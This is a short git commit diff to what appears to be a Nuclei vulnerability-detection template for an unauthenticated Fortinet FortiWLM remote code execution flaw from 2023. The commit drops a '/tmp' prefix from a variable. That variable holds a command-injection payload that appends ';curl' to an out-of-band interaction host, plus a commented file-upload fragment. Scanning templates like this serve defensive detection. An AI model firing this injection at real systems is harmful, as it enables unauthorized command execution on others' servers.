refactor(http): remove `/tmp` path in `progressfile` var
assumes that the `$systemTempDir` val is `/tmp` Signed-off-by: Dwi Siswanto <git@dw1.io>patch-1
parent
d4784b936d
commit
428de33322
|
@ -23,7 +23,7 @@ info:
|
||||||
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
|
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
progressfile: '/tmp/{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
|
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
Loading…
Reference in New Issue